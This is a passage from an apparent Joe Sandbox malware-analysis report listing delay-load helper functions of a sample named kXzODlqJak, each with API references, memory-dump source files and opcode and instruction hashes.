                                                                                                                                                                                                                                                                            • Instruction ID: 6c57a8bc2dba46828be56e757b092bfbbae2cc1821f2c2461480fb199581edbf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e356bb6153bf24294620575b673bbb129a7689a35b13e170a83d8cbac4b0cb8e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9B012CB35E102FF314411115D46D3A010CC0C4F10330E41FB404C0083E4C90C400037
                                                                                                                                                                                                                                                                            Function 0094C1F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 32e49c96d974aa5d041662c9638afc1f16621782f13bb11d1c53ea8c5d0c06df
                                                                                                                                                                                                                                                                            • Instruction ID: 04de7518901eb4c370c2b77b034d0793b55ac48bc200f3b36b918ec5bab16d5f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 32e49c96d974aa5d041662c9638afc1f16621782f13bb11d1c53ea8c5d0c06df
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6B012C735E1026E318451255C06E3A014CD0C8F14330E82FB018C0043D4890C440137
                                                                                                                                                                                                                                                                            Function 0094C16B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C183
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3bb3ea8fcd2c07e16f41f4284fe02ac39f0c36b23c5e3318b69a0da4213c7041
                                                                                                                                                                                                                                                                            • Instruction ID: 6fe982677c622a5d597220a272e546cc2aa8cfcdd03553aa7ff0389d04d66f2c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bb3ea8fcd2c07e16f41f4284fe02ac39f0c36b23c5e3318b69a0da4213c7041
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DB002D725F102BE315551555D57D3A125CC5C9B15331E95FB815D4042D5855C451037
                                                                                                                                                                                                                                                                            Function 0094C296 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: baa563fed62707f62aeebb682b78da489a36bb1b74664df992bc82eebadf39f0
                                                                                                                                                                                                                                                                            • Instruction ID: cb593d20059d88ce5b1493bce352a0eb94030b3ec090a903b5f65e4203531b75
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: baa563fed62707f62aeebb682b78da489a36bb1b74664df992bc82eebadf39f0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6B012C735E102AE318451255C06D3A014CC0C8F10330E42FB408C0043D4890C440137
                                                                                                                                                                                                                                                                            Function 0094C286 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1b1cd4ec3d435085c32f7f1cc156d126af4165a791bb894c6a087755ebcb2a43
                                                                                                                                                                                                                                                                            • Instruction ID: a615ea0dcf75ce5ed245d850968ffab39a23460c9deb8e52dd089ba71570398c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b1cd4ec3d435085c32f7f1cc156d126af4165a791bb894c6a087755ebcb2a43
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51B012C735F1066E318451255C07E3A014CD4C8F14330E81FB008C0043D4890C400137
                                                                                                                                                                                                                                                                            Function 0094C2B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 52008badc5d6b60344a55a946f3d937c9db86953b955942002436edf34fc3ed1
                                                                                                                                                                                                                                                                            • Instruction ID: 89f2856ef9480ab3d46a7b1c477d8b78ba052d024c21f0084a69a4605a2d82a8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52008badc5d6b60344a55a946f3d937c9db86953b955942002436edf34fc3ed1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7EB012C735E1026E318451255D06D3A014CC0C8F10330E42FB008C0043D48A0C450137
                                                                                                                                                                                                                                                                            Function 0094C2A6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 92475e62cd85d57e98e6f20011f46738ea8fc37dfbf2568778a8f651a4036c30
                                                                                                                                                                                                                                                                            • Instruction ID: 74bbfef841db41c3d2ec4002a5af12792ea9bfb0e93267fec2b6a029f1f80d74
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92475e62cd85d57e98e6f20011f46738ea8fc37dfbf2568778a8f651a4036c30
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EBB002D735E2026E329455655D06D3A055CC5C9F15331E56FB419C5143D48A5D891137
                                                                                                                                                                                                                                                                            Function 0094C2D6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 938a2d8c44724c62dec3024b349e4e099d9f351dc9d301976cdff0fb16b33524
                                                                                                                                                                                                                                                                            • Instruction ID: 19e4254b27ede2cd3f662d7f681f59080ab464c96bf8f792316c02365ef4a7fd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 938a2d8c44724c62dec3024b349e4e099d9f351dc9d301976cdff0fb16b33524
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24B012C735F202AE318451155C06D3A015CC0C8F10330E41FB408C1043D4890C44013B
                                                                                                                                                                                                                                                                            Function 0094C2C6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: c1a4a498d475d4af706ddc0b7eab7feacdf005add51d603c66397182949f05d6
                                                                                                                                                                                                                                                                            • Instruction ID: cdbf977c74b4e791ffea72ef924e232c445884723a449085b151e116f96f201f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1a4a498d475d4af706ddc0b7eab7feacdf005add51d603c66397182949f05d6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75B012CB35E202AE328451155D06D3A014CC0C8F10330E51FF008C4083E4890C840137
                                                                                                                                                                                                                                                                            Function 0094C212 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: c28e5f44b24bb016b5f2b04a7c61a28d707f6dc7c4b81f669a721926a656e953
                                                                                                                                                                                                                                                                            • Instruction ID: 2e9a1062e467b64ae314ebe95cf3759a1c26817c9ce952f5c47aa59416288071
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c28e5f44b24bb016b5f2b04a7c61a28d707f6dc7c4b81f669a721926a656e953
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0B002DB35E102AE319451555E06D3A015CD5C9F15331E55FB519C5183F48A5D451137
                                                                                                                                                                                                                                                                            Function 0094C202 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1b305a6e867a2686c31e936e346598c52b6c38ae28ba43c024245485826c3ef6
                                                                                                                                                                                                                                                                            • Instruction ID: 16dbf701959c8843e00e6544913eae88a09667ae86af3fffd9091736a868acec
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b305a6e867a2686c31e936e346598c52b6c38ae28ba43c024245485826c3ef6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45B012C735E102AE318451155C07D3A014CC4C8F10331E41FB408C0143D4890C400137
                                                                                                                                                                                                                                                                            Function 0094C236 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 386528d3f7d9d0184f7f6e08571d804d5241dc9f720283f4f40fc813589d2441
                                                                                                                                                                                                                                                                            • Instruction ID: b4d2aa0160bda0cd4307e40912b033d3313e0ab7f2e93ff0146139cdd66cd215
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 386528d3f7d9d0184f7f6e08571d804d5241dc9f720283f4f40fc813589d2441
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9B002DB35E102EE319451555D06E3A015CE5C9F15331E95FB419C5183E4895D451137
                                                                                                                                                                                                                                                                            Function 0094C222 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: ffb2826902fcd03d30a8258db4bc48ec8299edfeb9d056e59076f5bfdbe3b254
